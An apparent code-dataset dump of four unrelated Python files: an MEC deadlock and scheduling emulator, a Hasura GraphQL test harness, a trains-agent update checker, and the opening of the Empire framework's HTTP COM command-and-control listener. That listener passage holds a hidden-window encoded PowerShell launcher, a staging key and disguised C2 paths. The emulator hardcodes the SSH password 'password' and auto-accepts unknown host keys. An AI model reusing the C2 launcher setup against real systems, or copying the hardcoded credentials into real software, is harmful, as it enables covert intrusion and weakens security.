source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
7_rms_wound_wait_NS.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import paramiko
import ast
import time
import os
import getpass as gp
import data
hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20},
't2': {'wcet': 1, 'period': 5},
't3': {'wcet': 2, 'period': 10},
't4': {'wcet': 1, 'period': 10},
't5': {'wcet': 3, 'period': 15}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
offload_register = {} # {task: host_ip}
discovering = 0 # if discovering == 0 update host
_pos = 0 # keeps tracks of task and time
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_rtt(host):
rtt = pc.verbose_ping(host)
return rtt
def gcd(a, b):
if b == 0: return a
return gcd(b, a % b)
def lcm(a, b):
return int(a * b / gcd(a, b))
def LCM(list):
return reduce(lcm, list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def get_rms():
global tasks
global _pos
tasks = data.task[_pos]
_pos += 1
'''
tasks = {}
while len(tasks) < 3:
a = list(_tasks.keys())[gosh_dist(5)]
tasks[a] = _tasks[a]
'''
print('Running RMS on Tasks: ', tasks, '\n')
waiting_time_init()
a = load_tasks()
return scheduler(a)
def waiting_time_init():
global t_time
t_time = {i: [round(r.uniform(0.4, 0.8), 3), round((tasks[i]['period']) / (tasks[i]['wcet']), 3)] for i in
tasks} # t_time = {'ti': [execution_time, latency], ..}
t_time = {**t_time, **check_mec_offload()}
print('[Execution_time, Latency]: ', t_time)
def load_tasks():
global tasks
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = LCM(period_list)
# insert idle task
tasks['idle'] = {'wcet': lcm_period, 'period': lcm_period + 1}
return lcm_period
def scheduler(D):
queue = list(tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for time in range(D):
# insert new tasks into the queue
for t in tmp.keys():
if time == tmp[t]['deadline']:
if tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
min = D * 2
for task in queue:
if tmp[task]['deadline'] < min:
min = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([time, curr])
if curr != 'idle': rms.append(curr)
prev = curr
return offloaded + rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', n_need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload, 0)
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
global P
global R
# Number of processes
P = len(pro)
# Number of resources
R = 3
processes = ['{}_{}'.format(pro[i], i) for i in range(P)]
# Available instances of resources
avail = [5, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = '_'.join(i.split('_')[:-1]) # i = 't5_3_3', j = 't5_3'
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
w_send = time_dic[list(time_dic.keys())[-1]]
send_message(str(w_send)) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time['_'.join(i.split('_')[:-1])][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return avg1
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + message()
sock.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def message():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
global hosts
while True:
data, address = sock.recvfrom(1024)
if data.decode()[:5] == 'hello':
hosts[data.decode()[6:]] = address[0]
elif (data.decode()[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(data.decode()[7:])
# print('received: ', hosts)
elif (data.decode()[:6] != 'update') and (address[0] != host_ip):
w_time = calculate_mov_avg(address[0], float(data.decode()) + get_rtt(address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if address[0] in mec_waiting_time:
mec_waiting_time[address[0]].append(w_time)
else:
mec_waiting_time[address[0]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def mec_task_unicast(task, host_):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
cmd = ('echo "{} {} {}" >> /home/mec/deadlock_project/temp/task_share.txt'.format(host_ip, task, t_time[task[:2]])) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def cooperative_mec(mec_list, n):
for i in mec_list:
_host = mec_comparison()
if _host == 0:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
elif n == 0:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
def check_mec_offload():
global offloaded
offloaded = []
t_mec = {} # {t1: [execution, latency}
try:
fr = open('/home/mec/deadlock_project/temp/task_share.txt', 'r')
t = fr.readlines()
for i in t:
ta = i[:-1].split()[1][:2] + '_' + str(t.index(i))
offloaded.append(ta)
offload_register[ta] = i[:-1].split()[0]
t_mec[ta] = ast.literal_eval(''.join(i[:-1].split()[2:]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/task_share.txt')
print('Tasks Offloaded to MEC: {}'.format(offloaded))
except Exception as e:
print('no offloaded Task!')
return t_mec
def execute(local):
print('\nExecuting :', local)
send = []
for i in local:
j = '_'.join(i.split('_')[:-1])
time.sleep(t_time[j][0])
print('#' *((local.index(i) + 1) * 3), ' Executed: ', i)
if len(j) > 2:
send.append(j)
print('============== EXECUTION DONE ===============')
return send
def send_back_task(l_list):
_host_ip = ip_address()
for i in l_list:
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(offload_register[i], port, un, pw)
cmd = ('echo "{} {}" >> /home/mec/deadlock_project/temp/executed.txt'.format(i, _host_ip)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def receive_executed_task():
try:
fr = open('/home/mec/deadlock_project/temp/executed.txt', 'r')
t = fr.readlines()
for i in t:
i = i[:-1].split()
print('Received Executed task {} from {}'.format(i[0], i[1]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/executed.txt')
except Exception as e:
print('No Executed Tasks from MEC Received')
def run_me():
global discovering
global hosts
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts[message()]
discovering = 1
break
time.sleep(2)
start_loop()
def start_loop():
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
while True:
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
for i in range(500):
rms_list = get_rms()
print('RMS List of Processes: ', rms_list, '\n')
print('\nRunning Bankers Algorithm')
list_seq = get_exec_seq(rms_list)
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0], 1)
local_ = execute(compare_result[1])
if len(local_) > 0: # do only when there is a task to send back
send_back_task(local_)
receive_executed_task()
time.sleep(3)
print('\nEnter "Exit" to stop Programme!')
if x == 'exit':
print('\nProgramme Terminated')
break
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h1.start()
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
os.system('clear')
run_me()
if __name__ == "__main__":
main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_short":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_long":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
self.resp_queue = queue.Queue(maxsize=1)
self.error_queue = queue.Queue()
super().__init__(server_address, EvtsWebhookHandler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def get_error_queue_size(self):
sz = 0
while not self.error_queue.empty():
self.error_queue.get()
sz = sz + 1
return sz
def is_queue_empty(self):
return self.resp_queue.empty
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.ws_client = GQLWsClient(self, '/v1/graphql')
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v1q_f('queries/clear_db.yaml')
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h, b = None, v = None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def execute_query(self, q, url_path, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q(self, q, headers = {}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def v1metadataq(self, q, headers = {}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
|
check_update.py
|
import os
from time import sleep
import requests
import json
from threading import Thread
from .package.requirements import SimpleVersion
from ..version import __version__
__check_update_thread = None
def start_check_update_daemon():
global __check_update_thread
if __check_update_thread:
return
__check_update_thread = Thread(target=_check_update_daemon)
__check_update_thread.daemon = True
__check_update_thread.start()
def _check_new_version_available():
cur_version = __version__
update_server_releases = requests.get('https://updates.trains.allegro.ai/updates',
data=json.dumps({"versions": {"trains-agent": str(cur_version)}}),
timeout=3.0)
if update_server_releases.ok:
update_server_releases = update_server_releases.json()
else:
return None
trains_answer = update_server_releases.get("trains-agent", {})
latest_version = trains_answer.get("version")
cur_version = cur_version
latest_version = latest_version or ''
if SimpleVersion.compare_versions(cur_version, '>=', latest_version):
return None
patch_upgrade = True # latest_version.major == cur_version.major and latest_version.minor == cur_version.minor
return str(latest_version), patch_upgrade, trains_answer.get("description").split("\r\n")
def _check_update_daemon():
counter = 0
while True:
# noinspection PyBroadException
try:
latest_version = _check_new_version_available()
# only print when we begin
if latest_version:
if latest_version[1]:
sep = os.linesep
print('TRAINS-AGENT new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])))
else:
print('TRAINS-SERVER new version available: upgrade to v{} is recommended!'.format(
latest_version[0]))
except Exception:
pass
# sleep until the next day
sleep(60 * 60 * 24)
counter += 1
|
http_com.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import packets
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
